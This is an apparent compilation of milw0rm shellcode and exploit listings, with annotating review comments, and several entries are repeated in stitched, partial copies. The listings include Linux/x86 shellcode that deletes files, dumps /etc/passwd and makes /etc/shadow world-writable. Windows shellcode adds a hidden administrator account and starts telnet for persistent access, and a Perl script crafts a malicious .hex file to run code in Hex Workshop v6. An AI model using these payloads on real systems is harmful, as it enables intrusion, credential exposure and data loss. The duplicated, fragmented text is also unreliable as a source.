/*
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 Perl script execution 99 bytes + script length
.global _start
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
xor %edi, %edi
xor %esi, %esi
push %eax
push $0x6c702e30
push $0x30307470
push $0x69726373
mov %esp, %ebx
movb $0x5, %al
movb $0x41, %cl
int $0x80
jmp one
two:
mov %ebx, %esi
mov %eax, %ebx
pop %edi
push %edi
// Begin http://www.int80h.org/strlen/
xor %ecx, %ecx
xor %eax, %eax
not %ecx
repne scasb
not %ecx
dec %ecx
// End http://www.int80h.org/strlen/
pop %edi
mov %ecx, %eax
mov %edi, %ecx
mov %eax, %edx
movb $0x4, %al
int $0x80
movb $0x6, %al
int $0x80
mov %esi, %ebx
movb $0xf, %al
movw $0x1fc, %cx
int $0x80
movb $0xb, %al
xor %ecx, %ecx
xor %edx, %edx
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"
*/
// Linux/x86 payload bytes for the Perl-script dropper whose GAS source is in
// the comment block above.  Naming the array `main` presumably makes the
// linker use its first byte as the program entry point; that only works when
// the data section is executable -- verify with the toolchain in use.
// Observable host artifacts: a file "script000.pl" created in the current
// directory (mode 0000, then chmod to 0774), written with the trailing
// script text, and executed via execve.  Syscall numbers are Linux i386 (eax).
char main [] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"   // xor eax/ebx/ecx/edx -> all zero
"\x31\xff\x31\xf6\x50\x68\x30\x2e"   // xor edi/esi; push eax (NUL terminator); push "0.pl" ...
"\x70\x6c\x68\x70\x74\x30\x30\x68"   // ... push "pt00"; push ...
"\x73\x63\x72\x69\x89\xe3\xb0\x05"   // ... "scri" => esp -> "script000.pl"; ebx = esp; al = 5 (open)
"\xb1\x41\xcd\x80\xeb\x38\x89\xde"   // cl = 0x41 (O_WRONLY|O_CREAT), edx still 0 => mode 0000; int 0x80; jmp one; two: esi = ebx (path)
"\x89\xc3\x5f\x57\x31\xc9\x31\xc0"   // ebx = eax (fd); pop edi (script text address pushed by `call two`); push edi; ecx = eax = 0
"\xf7\xd1\xf2\xae\xf7\xd1\x49\x5f"   // inline strlen: not ecx; repne scasb; not ecx; dec ecx -> ecx = length; pop edi
"\x89\xc8\x89\xf9\x89\xc2\xb0\x04"   // eax = len; ecx = edi (buffer); edx = len; al = 4 (write)
"\xcd\x80\xb0\x06\xcd\x80\x89\xf3"   // int 0x80 (write fd, script, len); al = 6 (close); int 0x80; ebx = esi (path)
"\xb0\x0f\x66\xb9\xfc\x01\xcd\x80"   // al = 15 (chmod); cx = 0x1fc (octal 0774); int 0x80
"\xb0\x0b\x31\xc9\x31\xd2\xcd\x80"   // al = 11 (execve); ecx = edx = 0 (NULL argv/envp); int 0x80
"\xb0\x01\x31\xdb\xcd\x80\xe8\xc3"   // only reached if execve fails: al = 1 (exit, sets only the low byte of eax); ebx = 0; int 0x80; one: call two ...
"\xff\xff\xff"                       // ... (rel32 = -0x3d) pushes the address of the script text below
"#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"; // Here script source
# milw0rm
linux/x86 File unlinker 18 bytes + file path length
/*
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 File unlinker 18 bytes + file path length
.global _start
_start:
jmp one
two:
pop %ebx
movb $0xa,%al
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "file"
*/
// Linux/x86 payload bytes for the unlinker whose GAS source is above:
// unlink(path) then exit(0).  Host artifact: deletion of the path named by
// the trailing string.
// Note: as written this declaration has no terminating ';', so it does not
// compile until one is added after the path string.
// `al` is set without zeroing eax first, so the syscall number is only right
// if the upper bytes of eax happen to be zero already.
char main [] =
"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0"   // jmp one; two: pop ebx (path address pushed by `call two`); al = 10 (unlink); int 0x80; al = ...
"\x01\x31\xdb\xcd\x80\xe8\xf0\xff"   // ... 1 (exit); ebx = 0; int 0x80; one: call two (rel32 = -0x10) ...
"\xff\xff"                           // ... pushes the address of the path string
"file" //Here file path to delete (NUL-terminated by the C string literal)
# milw0rm
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 File unlinker 18 bytes + file path length
.global _start
_start:
jmp one
two:
pop %ebx
movb $0xa,%al
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "file"
*/
// Linux/x86 payload bytes for the unlinker whose GAS source is above:
// unlink(path) then exit(0).  Host artifact: deletion of the path named by
// the trailing string.
// Note: as written this declaration has no terminating ';', so it does not
// compile until one is added after the path string.
// `al` is set without zeroing eax first, so the syscall number is only right
// if the upper bytes of eax happen to be zero already.
char main [] =
"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0"   // jmp one; two: pop ebx (path address pushed by `call two`); al = 10 (unlink); int 0x80; al = ...
"\x01\x31\xdb\xcd\x80\xe8\xf0\xff"   // ... 1 (exit); ebx = 0; int 0x80; one: call two (rel32 = -0x10) ...
"\xff\xff"                           // ... pushes the address of the path string
"file" //Here file path to delete (NUL-terminated by the C string literal)
# milw0rm
Linux/x86 file reader 65 bytes + pathname
/*
Linux/x86 file reader.
65 bytes + pathname
Author: certaindeath
Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
// Linux/x86 payload bytes for the file reader whose GAS source is above:
// open(path, O_RDONLY), then read one byte at a time into a 1-byte stack
// slot and write it to fd 1 until read() returns 0, then exit(0).
// The loop only stops on a zero return from read(); a negative return (for
// example when open() failed and esi holds -errno) is not treated as an end
// condition, so the loop presumably never terminates in that case -- verify.
// Every syscall number is set through `al` only, relying on eax's upper
// bytes being zero (true here because the previous syscall returned a small
// non-negative value).
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"   // xor eax/ebx/ecx/edx
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"   // jmp two; one: pop ebx (path); al = 5 (open); ecx = 0 (O_RDONLY); int ...
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"   // ... 0x80; esi = eax (fd); jmp read; exit: al = 1; ebx = ...
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"   // ... 0; int 0x80 (exit); read: ebx = esi; al = 3 (read); sub ...
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"   // ... $1, esp (1-byte buffer); ecx = esp; dl = 1 (count); int ...
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"   // ... 0x80; ebx = 0; cmp eax, ebx; je exit (EOF); al = ...
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"   // ... 4 (write); bl = 1 (stdout); dl = 1; int 0x80; add ...
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"   // ... $1, esp (release the byte); jmp read; two: call one (rel32 = -0x37) ...
"\xff"                               // ... pushes the address of the path string
"/etc/passwd"; //Put here the file path, default is /etc/passwd
# milw0rm
Linux/x86 file reader.
65 bytes + pathname
Author: certaindeath
Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
// Linux/x86 payload bytes for the file reader whose GAS source is above:
// open(path, O_RDONLY), then read one byte at a time into a 1-byte stack
// slot and write it to fd 1 until read() returns 0, then exit(0).
// The loop only stops on a zero return from read(); a negative return (for
// example when open() failed and esi holds -errno) is not treated as an end
// condition, so the loop presumably never terminates in that case -- verify.
// Every syscall number is set through `al` only, relying on eax's upper
// bytes being zero (true here because the previous syscall returned a small
// non-negative value).
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"   // xor eax/ebx/ecx/edx
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"   // jmp two; one: pop ebx (path); al = 5 (open); ecx = 0 (O_RDONLY); int ...
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"   // ... 0x80; esi = eax (fd); jmp read; exit: al = 1; ebx = ...
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"   // ... 0; int 0x80 (exit); read: ebx = esi; al = 3 (read); sub ...
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"   // ... $1, esp (1-byte buffer); ecx = esp; dl = 1 (count); int ...
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"   // ... 0x80; ebx = 0; cmp eax, ebx; je exit (EOF); al = ...
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"   // ... 4 (write); bl = 1 (stdout); dl = 1; int 0x80; add ...
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"   // ... $1, esp (release the byte); jmp read; two: call one (rel32 = -0x37) ...
"\xff"                               // ... pushes the address of the path string
"/etc/passwd"; //Put here the file path, default is /etc/passwd
# milw0rm
Win32 telnetbind by winexec 111 bytes
; payload:add admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it is similar to a TCP bind shell on port 23: through command execution we can get shell access through the telnet service on a Windows box.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
; Layout: a two-byte jump over the Exec stub to Data, where `CALL Exec`
; pushes the address of the command string so that it sits on the stack as
; WinExec's first argument (lpCmdLine).
; NOTE(review): the command string below names the user "exploitvuln" and
; joins the commands with "&", while the byte listing in the header names a
; different user and uses "&&"; the stated 111-byte size matches the header
; listing, not this source.  Host artifacts: a new local user added to the
; Administrateurs group and the TlntSvr service started.
db 0EBh,08h ;"jmp Data" written as raw bytes; the author does this to avoid a NUL byte in the assembled output.
Exec:
MOV EDX,7C86114Dh ;WinExec address hard-coded for WinXP SP2 FR; valid only on that exact build.
CALL EDX ;WinExec(lpCmdLine, uCmdShow): lpCmdLine is the string address pushed by CALL Exec, uCmdShow is whatever dword is next on the stack.
INT3 ;breakpoint trap to stop after WinExec returns instead of running into the data (ExitProcess would be the clean alternative).
Data:
CALL Exec ;pushes the address of the string below as the return address, i.e. the first argument.
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
;adds user exploitvuln with password 123456 and starts the telnet service; the ".exe" extension was dropped to save bytes.
#milw0rm
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it is similar to a TCP bind shell on port 23: through command execution we can get shell access through the telnet service on a Windows box.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
; Layout: a two-byte jump over the Exec stub to Data, where `CALL Exec`
; pushes the address of the command string so that it sits on the stack as
; WinExec's first argument (lpCmdLine).
; NOTE(review): the command string below names the user "exploitvuln" and
; joins the commands with "&", while the byte listing in the header names a
; different user and uses "&&"; the stated 111-byte size matches the header
; listing, not this source.  Host artifacts: a new local user added to the
; Administrateurs group and the TlntSvr service started.
db 0EBh,08h ;"jmp Data" written as raw bytes; the author does this to avoid a NUL byte in the assembled output.
Exec:
MOV EDX,7C86114Dh ;WinExec address hard-coded for WinXP SP2 FR; valid only on that exact build.
CALL EDX ;WinExec(lpCmdLine, uCmdShow): lpCmdLine is the string address pushed by CALL Exec, uCmdShow is whatever dword is next on the stack.
INT3 ;breakpoint trap to stop after WinExec returns instead of running into the data (ExitProcess would be the clean alternative).
Data:
CALL Exec ;pushes the address of the string below as the return address, i.e. the first argument.
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
;adds user exploitvuln with password 123456 and starts the telnet service; the ".exe" extension was dropped to save bytes.
#milw0rm
Hex Workshop v6 (.HEX File) Local Code Execution Exploit
#!/usr/bin/perl -w
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovered by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information visit my blog:http://datasniper.arab4services.net/
# the exploit is quite weird ;) -- take a look at the shellcode, and remember it's not AlphaNum.
#
# What the script does: writes one crafted file (Xploit.hex) consisting of a
# record header, a 248-byte filler, an address block, a NOP sled and the
# payload.  Everything after the header is ASCII hex text, not raw bytes.
# The exact output bytes are the point of the script, so nothing below is
# reformatted.
print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";   # record header text followed by CRLF and a second ':'
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";# shell address in the stack plus some address junk the author says is needed to make the exploit work (hex text).
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# 15 x 0x90 as hex text (NOP sled)
#shellcode from metasploit,execute calc.exe
#shellcode copied as-is (hex text); per the author the importer converts it back to bytes when the file is processed.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;   # 248-byte filler in front of the address block
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
# NOTE(review): ">>" opens in append mode, so re-running the script appends a
# second copy rather than overwriting; and the die message interpolates the
# filehandle ($data) rather than the file name ($fle).
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";
# milw0rm
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovered by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information visit my blog:http://datasniper.arab4services.net/
# the exploit is quite weird ;) -- take a look at the shellcode, and remember it's not AlphaNum.
#
# What the script does: writes one crafted file (Xploit.hex) consisting of a
# record header, a 248-byte filler, an address block, a NOP sled and the
# payload.  Everything after the header is ASCII hex text, not raw bytes.
# The exact output bytes are the point of the script, so nothing below is
# reformatted.
print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";   # record header text followed by CRLF and a second ':'
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";# shell address in the stack plus some address junk the author says is needed to make the exploit work (hex text).
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# 15 x 0x90 as hex text (NOP sled)
#shellcode from metasploit,execute calc.exe
#shellcode copied as-is (hex text); per the author the importer converts it back to bytes when the file is processed.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;   # 248-byte filler in front of the address block
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
# NOTE(review): ">>" opens in append mode, so re-running the script appends a
# second copy rather than overwriting; and the die message interpolates the
# filehandle ($data) rather than the file name ($fle).
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";
# milw0rm
win32 PEB!NtGlobalFlags shellcode 14 bytes
/*
PEB!NtGlobalFlags ( 14 BYTES )
Author: Koshi
Description: Uses the PEB method to determine whether a debugger is
attached to the running process or not. No 9x. :(
Length: 14 Bytes
Registers Used: EAX,ESI,ESP
Compiled: jpXV34dd3v09Fh
*/
/*
00401000 > 6A 70 PUSH 70
00401002 58 POP EAX
00401003 56 PUSH ESI
00401004 333464 XOR ESI,DWORD PTR SS:[ESP]
00401007 64:3376 30 XOR ESI,DWORD PTR FS:[ESI+30]
0040100B 3946 68 CMP DWORD PTR DS:[ESI+68],EAX
JE DebuggerPresent ( If equal debugger attached )
*/
// 14-byte check of PEB->NtGlobalFlag (see the disassembly above): eax = 0x70;
// esi is cleared by XORing it with a pushed copy of itself, then set to
// FS:[0x30] (the PEB); finally CMP [esi+0x68], eax.  The `je` that would act
// on the result is not part of these 14 bytes -- they end at the CMP, so the
// caller must supply the branch.  The compared value 0x70 is presumably the
// heap-checking flag set (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK |
// FLG_HEAP_VALIDATE_PARAMETERS) that a process started under a debugger
// carries -- verify against the target OS version.
// Note the pushed esi is never popped, so the stack is left 4 bytes deeper.
unsigned char Shellcode[] =
{"\x6A\x70\x58\x56\x33\x34\x64"   // push 0x70; pop eax; push esi; xor esi,[esp]  (esi = 0)
"\x64\x33\x76\x30\x39\x46\x68"};  // xor esi,fs:[esi+0x30]  (esi = PEB); cmp [esi+0x68],eax
// Test driver.  Prints the payload length, then passes the byte array itself
// to printf as the format string -- that only echoes the 14 raw bytes to
// stdout (none of them is '%'); it does not execute them.  `printf` is used
// without a visible #include <stdio.h> in this listing, and "%u" with a
// size_t argument is only correct where size_t is 32-bit.
int main( int argc, char *argv[] )
{
printf( "Shellcode is %u bytes.\n", sizeof(Shellcode)-1 );   // -1 for the literal's terminating NUL
printf( Shellcode, sizeof(Shellcode) );   // non-literal format string: harmless for these bytes, but a classic format-string hazard
return 0;
}
# milw0rm
win32 XP sp2 (FR) Sellcode cmd.exe 32 bytes
/*
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
Author : Mountassif Moad
Big Thnx : Houssamix & SimO-s0fT
Changed by : Stack
Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
My first original shellcode Here http://www.milw0rm.com/shellcode/7971
because i receive every day full message who insult me (you'r lamer - fucker ->
you dont understand anything abouts sec ) infinity of insult
and the last time i receive an message have => i make full error in my first shelcode & in the end he
insult my mother & me (shit)
so i tell all people when want insult anyone remembers we are just human not angel
euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
Assembly Code : this time is not a secret (:@)
00402000 8BEC MOV EBP,ESP
00402002 33FF XOR EDI,EDI
00402004 57 PUSH EDI
00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00402018 50 PUSH EAX
00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
0040201E FFD0 CALL EAX
*/
#include "stdio.h"
// 32-byte payload matching the disassembly above: builds the string "cmd"
// at ebp-4 (the bytes 'c','m','d' followed by a NUL left over from `push edi`),
// pushes its address and calls a hard-coded address that the listing labels
// msvcrt.system -- valid only for the DLL build the author tested on (XP SP2 FR).
// The `mov byte [ebp-8],1` is dead: the following `push eax` writes the same
// dword.  Nothing follows the call, so whatever system() returns to is
// undefined from this payload's point of view.
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"          // mov ebp,esp; xor edi,edi; push edi  (four zero bytes at ebp-4..ebp-1)
"\xC6\x45\xFC\x63\xC6\x45"      // mov byte [ebp-4],'c'; mov byte [ebp-3] ...
"\xFD\x6D\xC6\x45\xFE\x64"      // ... ,'m'; mov byte [ebp-2],'d'  (ebp-1 stays 0: terminator)
"\xC6\x45\xF8\x01\x8D"          // mov byte [ebp-8],1 (overwritten by the push below); lea ...
"\x45\xFC\x50\xB8\xC7\x93"      // ... eax,[ebp-4]; push eax; mov eax, ...
"\xBF\x77\xFF\xD0";             // ... 0x77BF93C7 (msvcrt.system per the listing); call eax
// Driver that runs the payload by overwriting its own saved return address:
// `&ret + 2` assumes a 32-bit frame in which the saved EIP sits two slots
// above the local, which holds only for a specific compiler/frame layout
// (no stack protector, no frame-pointer omission).  It also requires the
// data section holding `shellcode` to be executable, which DEP/NX prevents.
// `strlen` is used with no visible <string.h>, and "%d" with a size_t
// argument is only correct on 32-bit targets -- both affect only the print.
int main ()
{
int *ret;
ret=(int *)&ret+2;   // presumed address of this frame's saved return address
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;   // on return, execution continues at the payload
return 0;
}
# milw0rm
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
Author : Mountassif Moad
Big Thnx : Houssamix & SimO-s0fT
Changed by : Stack
Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
My first original shellcode Here http://www.milw0rm.com/shellcode/7971
because i receive every day full message who insult me (you'r lamer - fucker ->
you dont understand anything abouts sec ) infinity of insult
and the last time i receive an message have => i make full error in my first shelcode & in the end he
insult my mother & me (shit)
so i tell all people when want insult anyone remembers we are just human not angel
euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
Assembly Code : this time is not a secret (:@)
00402000 8BEC MOV EBP,ESP
00402002 33FF XOR EDI,EDI
00402004 57 PUSH EDI
00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00402018 50 PUSH EAX
00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
0040201E FFD0 CALL EAX
*/
#include "stdio.h"
// 32-byte payload matching the disassembly above: builds the string "cmd"
// at ebp-4 (the bytes 'c','m','d' followed by a NUL left over from `push edi`),
// pushes its address and calls a hard-coded address that the listing labels
// msvcrt.system -- valid only for the DLL build the author tested on (XP SP2 FR).
// The `mov byte [ebp-8],1` is dead: the following `push eax` writes the same
// dword.  Nothing follows the call, so whatever system() returns to is
// undefined from this payload's point of view.
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"          // mov ebp,esp; xor edi,edi; push edi  (four zero bytes at ebp-4..ebp-1)
"\xC6\x45\xFC\x63\xC6\x45"      // mov byte [ebp-4],'c'; mov byte [ebp-3] ...
"\xFD\x6D\xC6\x45\xFE\x64"      // ... ,'m'; mov byte [ebp-2],'d'  (ebp-1 stays 0: terminator)
"\xC6\x45\xF8\x01\x8D"          // mov byte [ebp-8],1 (overwritten by the push below); lea ...
"\x45\xFC\x50\xB8\xC7\x93"      // ... eax,[ebp-4]; push eax; mov eax, ...
"\xBF\x77\xFF\xD0";             // ... 0x77BF93C7 (msvcrt.system per the listing); call eax
// Driver that runs the payload by overwriting its own saved return address:
// `&ret + 2` assumes a 32-bit frame in which the saved EIP sits two slots
// above the local, which holds only for a specific compiler/frame layout
// (no stack protector, no frame-pointer omission).  It also requires the
// data section holding `shellcode` to be executable, which DEP/NX prevents.
// `strlen` is used with no visible <string.h>, and "%d" with a size_t
// argument is only correct on 32-bit targets -- both affect only the print.
int main ()
{
int *ret;
ret=(int *)&ret+2;   // presumed address of this frame's saved return address
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;   // on return, execution continues at the payload
return 0;
}
# milw0rm
linux/x86 chmod("/etc/shadow",666) & exit(0) 30 bytes
/*
Linux/x86 - chmod("/etc/shadow",666) & exit(0)
Info reg
------------------
%eax = 15
%ebx = /etc/shadow
%ecx = 666
%eax = 1
%ebx = 0
Shellcode 30 bytes
Author: Jonathan Salwan <>
Web: http://www.shell-storm.org
Disassembly of section .text:
08048054 <.text>:
8048054: 51 push %ecx
8048055: 66 b9 b6 01 mov $0x1b6,%cx
8048059: 68 61 64 6f 77 push $0x776f6461
804805e: 68 63 2f 73 68 push $0x68732f63
8048063: 68 2f 2f 65 74 push $0x74652f2f
8048068: 89 e3 mov %esp,%ebx
804806a: 6a 0f push $0xf
804806c: 58 pop %eax
804806d: cd 80 int $0x80
804806f: 40 inc %eax
8048070: cd 80 int $0x80
*/
#include "stdio.h"
// Driver: places the 30 payload bytes in a stack array and calls them as a
// function, which requires an executable stack (NX/DEP and a non-executable
// stack marking defeat it).  Host artifact of the payload: /etc/shadow mode
// changed to 0666, a condition file-integrity monitoring should flag.
// `strlen` has no visible <string.h>, and "%d" with a size_t argument is only
// correct on 32-bit targets -- diagnostic output only.
int main(int argc, char *argv[])
{
char shellcode[] = "\x51\x66\xb9\xb6"   // push ecx; mov cx,0x1b6 (octal 0666) -- only the low 16 bits of ecx are set, the upper bits keep whatever ecx held
"\x01\x68\x61\x64"                      // push "adow" ...
"\x6f\x77\x68\x63" // chmod("/etc/shadow",666)   ... push "c/sh" ...
"\x2f\x73\x68\x68"
"\x2f\x2f\x65\x74"                      // ... push "//et" => esp -> "//etc/shadow"; no NUL is pushed, the terminator is the low byte of the ecx pushed first
"\x89\xe3\x6a\x0f"                      // ebx = esp (path); push 15
"\x58\xcd\x80"                          // pop eax (chmod); int 0x80
"\x40\xcd\x80"; // exit(0); -- inc eax -> 1 (exit) assuming chmod returned 0; ebx still holds the path pointer, so the status is its low byte rather than 0
printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();   // jumps into the stack array
return 0;
}
# milw0rm